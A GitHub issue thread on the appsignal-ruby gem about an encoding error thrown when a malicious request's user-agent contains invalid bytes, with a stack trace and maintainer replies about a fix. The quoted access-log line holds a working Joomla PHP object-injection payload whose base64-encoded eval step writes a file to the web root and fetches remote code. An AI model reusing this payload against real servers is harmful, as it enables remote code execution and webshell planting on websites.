### ISSUE TITLE
Appsignal does not handle encoding errors

### ISSUE THREAD

**Issue by pouellet** [appsignal/appsignal-ruby#108]
### Issue

Appsignal middleware raises an uncaught exception when the request contains an invalid malicious user-agent. We received several requests similar to this one in our production server lately:

```
[20/May/2016:22:20:50 +0000] "GET / HTTP/1.1" 301 98 "-" "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:1182:\x22eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2xvbGEucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21WamFHOGdJbTFoWjI1dmJTQmhkWFJ2SUdOeVpXRjBJR1pwYkdWeklqc05DZzBLWm5WdVkzUnBiMjRnYUhSMGNGOW5aWFFvSkhWeWJDbDdEUW9KSkdsdElEMGdZM1Z5YkY5cGJtbDBLQ1IxY213cE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOVNSVlJWVWs1VVVrRk9VMFpGVWl3Z01TazdEUW9KWTNWeWJGOXpaWFJ2Y0hRb0pHbHRMQ0JEVlZKTVQxQlVYME5QVGs1RlExUlVTVTFGVDFWVUxDQXhNQ2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBaUFRFeFBWMHhQUTBGVVNVOU9MQ0F4S1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlNFVkJSRVZTTENBd0tUc05DZ2x5WlhSMWNtNGdZM1Z5YkY5bGVHVmpLQ1JwYlNrN0RRb0pZM1Z5YkY5amJHOXpaU2drYVcwcE93MEtmUTBLSkdOb1pXTnJOVDBrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVWs5UFZDZGRJQzRnSWk5c2FXSnlZWEpwWlhNdmJHVm5ZV041TDJ4dlp5OXFjeTV3YUhBaUlEc05DaVIwWlhoME5TQTlJR2gwZEhCZloyVjBLQ2RvZEhSd2N6b3ZMMmRvYjNOMFltbHVMbU52YlM5d1lYTjBaUzloZHpWallTOXlZWGNuS1RzTkNpUnZjRFU5Wm05d1pXNG9KR05vWldOck5Td2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTFMQ1IwWlhoME5TazdEUXBtWTJ4dmMyVW9KRzl3TlNrN0RRcEFkVzVzYVc1cktGOWZSa2xNUlY5ZktUc05DajgrJykpOw0KZmNsb3NlKCRmcCk7'));JFactory::getConfig();exit\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\xFD\xFD\xFD"
```

When the appsignal middleware tries to reports the request, the following exception get thrown:
```
Encoding::UndefinedConversionError: "\xF0" from ASCII-8BIT to UTF-8

/gems/json-1.8.3/lib/json/common.rb:223 in encode
/gems/json-1.8.3/lib/json/common.rb:223 in generate
/gems/json-1.8.3/lib/json/common.rb:223 in generate
/gems/appsignal-1.0.1/lib/appsignal/transaction.rb:116 in set_sample_data
/gems/appsignal-1.0.1/lib/appsignal/transaction.rb:129 in block in sample_data
/gems/appsignal-1.0.1/lib/appsignal/transaction.rb:128 in each
/gems/appsignal-1.0.1/lib/appsignal/transaction.rb:128 in sample_data
/gems/appsignal-1.0.1/lib/appsignal/transaction.rb:54 in complete
/gems/appsignal-1.0.1/lib/appsignal/transaction.rb:28 in complete_current!
/gems/appsignal-1.0.1/lib/appsignal/rack/rails_instrumentation.rb:40 in call_with_appsignal_monitoring
/gems/appsignal-1.0.1/lib/appsignal/rack/rails_instrumentation.rb:13 in call
```

The code this refer to only catches `JSON::GeneratorError` errors, but I believe there is a lot more that can be thrown by a call to `JSON.generate`.

### Versions
> Appsignal version : 1.1.5
> Rails version : 4.2.6
> Ruby version : 2.2.4p230

This exception being raised by app-signal can also trigger the airbrake-ruby gem to go into a infinite loop (https://github.com/airbrake/airbrake-ruby/issues/82). It is not directly related to this issue, but in case someone else run into this, I thought it might be good to mention as it tore down one of our production server.

**Comment by thijsc** [comment]
Thanks for reporting this. We'll roll out a fix for this on Monday.

**Comment by thijsc** [comment]
Made the rescue match wider here: 75ea53a9cc5034bfc0656ce33a0f00d37d28a407

I'm not sure how this exception could have occurred. We already convert to UTF-8 here: https://github.com/appsignal/appsignal-ruby/blob/master/lib/appsignal/utils.rb#L53
Is this the full backtrace? I'd expect `Appsignal::Utils.json_generate` to be in there too.

**Comment by thijsc** [comment]
I just published `1.1.7.beta.2` which includes this fix.

**Comment by thijsc** [comment]
Version `1.1.7` was just officially released.

**Comment by pouellet** [comment]
Hi Thijs, sorry for the late answer. 

Regarding https://github.com/appsignal/appsignal-ruby/issues/108#issuecomment-220958328, I just realized that I reported the wrong version of appsignal in my original description. After double checking, our stack was actually running on 1.0.1 (as we see in the stacktrace). That would explain why the `Appsignal::Utils.json_generate` wasn't part of the stacktrace. I hope this issue was still relevant in the newer version. 😳 

Sorry about that, I'll make sure to deploy the latest version.
